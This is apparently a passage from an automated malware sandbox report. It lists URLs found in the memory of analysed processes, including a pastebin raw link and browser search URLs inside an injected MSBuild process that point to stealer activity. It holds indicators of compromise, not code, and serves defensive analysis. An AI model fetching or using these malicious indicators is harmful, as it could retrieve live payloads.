                              Source: run.exe, run.exe, 00000005.00000002.2295837403.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000005.00000000.2239188364.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000002.2727602802.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 0000000D.00000000.2649348113.000000000022C000.00000002.00000001.01000000.00000009.sdmp, run.exe.0.drString found in binary or memory: http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmpString found in binary or memory: http://google.com
                              Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0A
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0C
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                              Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0N
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                              Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.drString found in binary or memory: http://ocsp.digicert.com0X
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005EDD000.00000004.00000020.00020000.00000000.sdmp, run.exe.0.drString found in binary or memory: http://ocsp.thawte.com0
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                              Source: MSBuild.exe, 0000000C.00000002.2979656703.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005EDD000.00000004.00000020.00020000.00000000.sdmp, run.exe.0.drString found in binary or memory: http://sf.symcb.com/sf.crl0f
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005EDD000.00000004.00000020.00020000.00000000.sdmp, run.exe.0.drString found in binary or memory: http://sf.symcb.com/sf.crt0
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005EDD000.00000004.00000020.00020000.00000000.sdmp, run.exe.0.drString found in binary or memory: http://sf.symcd.com0&
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmp, u3bs.3.exe, 00000011.00000002.2974514605.000000000265B000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
                              Source: u3bs.3.exe, 00000011.00000002.2974514605.0000000002686000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx.
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005EDD000.00000004.00000020.00020000.00000000.sdmp, run.exe.0.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005EDD000.00000004.00000020.00020000.00000000.sdmp, run.exe.0.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005EDD000.00000004.00000020.00020000.00000000.sdmp, run.exe.0.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                              Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.drString found in binary or memory: http://www.digicert.com/CPS0
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007228000.00000004.00000020.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000000.2777480035.000000000041C000.00000020.00000001.01000000.00000012.sdmp, u3bs.3.exe, 00000011.00000002.2974514605.00000000026E2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.indyproject.org/
                              Source: run.exe, 00000005.00000002.2297293359.0000000003B79000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005628000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E01000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.0000000005721000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.info-zip.org/
                              Source: u3bs.0.exe, u3bs.0.exe, 00000001.00000002.3000172232.000000006B0ED000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.1.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                              Source: u3bs.0.exe, 00000001.00000002.2999981368.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, u3bs.0.exe, 00000001.00000002.2988382496.000000001E770000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0
                              Source: run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.vmware.com/0/
                              Source: MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                              Source: MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                              Source: MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                              Source: MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                              Source: MSBuild.exe, 0000000C.00000002.3006749447.00000000066D3000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3006242825.00000000066C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005EDD000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp, run.exe.0.drString found in binary or memory: https://d.symcb.com/cps0%
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2231044420.0000000005EDD000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp, run.exe.0.drString found in binary or memory: https://d.symcb.com/rpa0
                              Source: u3bs.3.exe, 00000011.00000002.2974514605.000000000266E000.00000004.00001000.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000002.2974514605.00000000026F8000.00000004.00001000.00020000.00000000.sdmp, u3bs.3.exe, 00000011.00000002.2974514605.000000000268E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe
                              Source: u3bs.3.exe, 00000011.00000002.2974514605.00000000026CC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.
                              Source: u3bs.3.exe, 00000011.00000002.2974514605.00000000026A4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.6-
                              Source: u3bs.3.exe, 00000011.00000002.2969616251.00000000008D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exebbC
                              Source: MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                              Source: MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                              Source: MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabS
                              Source: MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002B2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                              Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.drString found in binary or memory: https://mozilla.org0/
                              Source: MSBuild.exe, 0000001B.00000002.2976876092.00000000033A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/z9pYkqPQ
                              Source: MSBuild.exe, 0000001B.00000002.2976876092.00000000033A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/z9pYkqPQPOdq8
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0D
                              Source: u3bs.0.exe, 00000001.00000003.2563120813.0000000005CC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                              Source: u3bs.0.exe, 00000001.00000003.2563120813.0000000005CC1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                              Source: u3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmp, u3bs.0.exe, 00000001.00000003.1982604362.00000000246ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                              Source: u3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe
                              Source: u3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmp, u3bs.0.exe, 00000001.00000003.1982604362.00000000246ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                              Source: u3bs.0.exe, 00000001.00000002.2968269740.0000000000549000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe
                              Source: TNQTc6Qmkg.exe, 00000000.00000003.2778288110.0000000007614000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000005.00000002.2297293359.0000000003BCF000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000006.00000002.2594864745.0000000005671000.00000004.00000800.00020000.00000000.sdmp, run.exe, 0000000D.00000002.2730690127.0000000003E57000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.2971340009.000000000576A000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.drString found in binary or memory: https://www.digicert.com/CPS0
                              Source: MSBuild.exe, 0000000C.00000002.2979656703.0000000002A33000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002AD4000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002BCB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.000000000291B000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D7D000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002C21000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D18000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A92000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2979656703.0000000002D1E000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2993542195.0000000003A76000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 